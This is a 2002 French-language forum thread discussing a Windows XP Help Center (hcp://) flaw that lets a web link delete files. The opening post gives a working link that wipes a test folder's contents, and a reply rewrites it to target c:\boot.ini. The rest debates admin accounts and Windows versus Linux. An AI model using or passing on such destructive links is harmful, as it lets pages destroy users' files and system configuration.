j'allais pas attendre 4 jours...
j'allais pas attendre 4 jours... - Linux et OS Alternatifs
Marsh Posté le 10-09-2002 à 15:09:19
| buchu a écrit a écrit : Une jolie faille de sécurité dans XP qui permet d'effacer un répertoire depuis une page web. Ex: un répertoire c:\test. Tu mets un ou 2 fichiers bidons tu copies ce lien dans ton butineur préféré (putain même Mozilla se fait avoir) hcp://system/DFS/uplddrvinfo.htm?file://c:\test\* Et regarde le résultat. J'en suis resté sur le cul !!! Pour info : http://www.security.nnov.ru/search [...] docid=3370 |
ca prend pas en compte les droits ?
---------------
"Every solution breeds new problems"
Marsh Posté le 10-09-2002 à 15:16:10
| ze_cameleon a écrit a écrit : ca prend pas en compte les droits ? |
Sous win, tout le monde se logge en admin ou avec un user du groupe admin.
Scripting.FileSystemObject est une classe de merde, qui ne devrais pas exister.
---------------
brisez les rêves des gens, il en restera toujours quelque chose... -- laissez moi troller sur discu !
Marsh Posté le 10-09-2002 à 16:30:38
C'est dans S&R qu'il faut aller poster ça. Là-bas, c'est troll tous les jours, non ?
Marsh Posté le 10-09-2002 à 16:36:13
| Chubaca a écrit a écrit : XP cai de la merde, je l'ai toujours dit  |
Windows c'est de la merde, je l'ai toujours dit
---------------
-- NO SLACKERS - violators will be fsck'd & tar'd
Marsh Posté le 10-09-2002 à 16:48:07
mais s'il est en admin le gars, il a aucun risque si ?
---------------
http://membres.lycos.fr/djohdjoh http://www.enduring-freedoms.org/sommaire.php3
Marsh Posté le 10-09-2002 à 16:49:47
| djoh a écrit a écrit : mais s'il est en admin le gars, il a aucun risque si ? |
hcp://system/DFS/uplddrvinfo.htm?file://c:\boot.ini
---------------
brisez les rêves des gens, il en restera toujours quelque chose... -- laissez moi troller sur discu !
Marsh Posté le 10-09-2002 à 17:18:18
| kadreg a écrit a écrit : hcp://system/DFS/uplddrvinfo.htm?file://c:\boot.ini |
bourdail !
s'il est pas en admin je voulais dire 
---------------
http://membres.lycos.fr/djohdjoh http://www.enduring-freedoms.org/sommaire.php3
Marsh Posté le 10-09-2002 à 17:47:44
| djoh a écrit a écrit : bourdail ! s'il est pas en admin je voulais dire |
---------------
http://membres.lycos.fr/djohdjoh http://www.enduring-freedoms.org/sommaire.php3
Marsh Posté le 10-09-2002 à 17:47:48
| djoh a écrit a écrit : bourdail ! s'il est pas en admin je voulais dire |
---------------
http://membres.lycos.fr/djohdjoh http://www.enduring-freedoms.org/sommaire.php3
Marsh Posté le 10-09-2002 à 17:47:54
| djoh a écrit a écrit : bourdail ! s'il est pas en admin je voulais dire |
---------------
http://membres.lycos.fr/djohdjoh http://www.enduring-freedoms.org/sommaire.php3
Marsh Posté le 10-09-2002 à 17:54:26
| djoh a écrit a écrit : |
Alors, on flood ?
![[:webcop]](https://forum-images.hardware.fr/images/perso/webcop.gif "[:webcop]")
---------------
brisez les rêves des gens, il en restera toujours quelque chose... -- laissez moi troller sur discu !
Marsh Posté le 10-09-2002 à 17:57:49
| kadreg a écrit a écrit : Alors, on flood ? |
bah ouai ça répond pas 
je précise que si qq'un se log en root sous nux, c'est le même toppo, donc windows c'est pourri, mais faut pas exagérer et comparer ce qui est comparable
sinon on est pas crédible face au enteter de windowsiens 
---------------
http://membres.lycos.fr/djohdjoh http://www.enduring-freedoms.org/sommaire.php3
Marsh Posté le 10-09-2002 à 18:02:59
| djoh a écrit a écrit : bah ouai ça répond pas je précise que si qq'un se log en root sous nux, c'est le même toppo, donc windows c'est pourri, mais faut pas exagérer et comparer ce qui est comparable sinon on est pas crédible face au enteter de windowsiens |
Sauf que le Windowsien de base trouve stupide d'avoir un compte avec des droits limités quand c'est sa propre machine.
Et puis sous Windows XP Maison Édition, un utilisateur avec compte limité a quand même le droit d'écrire dans /Program Files (et effacer aussi, il me semble, je revérifierai). Donc bon ...
Marsh Posté le 10-09-2002 à 18:07:31
| Jak a écrit a écrit : Sauf que le Windowsien de base trouve stupide d'avoir un compte avec des droits limités quand c'est sa propre machine. Et puis sous Windows XP Maison Édition, un utilisateur avec compte limité a quand même le droit d'écrire dans /Program Files (et effacer aussi, il me semble, je revérifierai). Donc bon ... |
pour program files c'est à vérifier, mais si le windowsien de base, qui n'est en fait qu'un user de base, ne veut pas se faire chier avec un compte admin, on peut pas en vouloir à windows (j'ai déjà vu des cremes qui faisait tout en root sous linux)
---------------
http://membres.lycos.fr/djohdjoh http://www.enduring-freedoms.org/sommaire.php3
Marsh Posté le 10-09-2002 à 18:18:17
FRANCHEMENT JE VOIS PAS PKOI CE TOPIC EST ICI !!!
un modo ne pourrait po le foutre ailleurs ?
c po une décharge OSA, quand même ?
Sujets relatifs:
- [Gentoo] 1.2, 1.4_beta ou attendre la 1.4?
- pq mon httpd il redémarre tous les jours à 4H du mat' ?? (résolu)
- ssh: ne pas attendre la fin d'une commande
- Je cherche des links à jours qui expliquent comment :
Marsh Posté le 10-09-2002 à 13:53:45
Une jolie faille de sécurité dans XP qui permet d'effacer un répertoire depuis une page web.
Ex: un répertoire c:\test. Tu mets un ou 2 fichiers bidons tu copies ce lien dans ton butineur préféré (putain même Mozilla se fait avoir)
hcp://system/DFS/uplddrvinfo.htm?file://c:\test\*
Et regarde le résultat.
J'en suis resté sur le cul !!!
Pour info : http://www.security.nnov.ru/search [...] docid=3370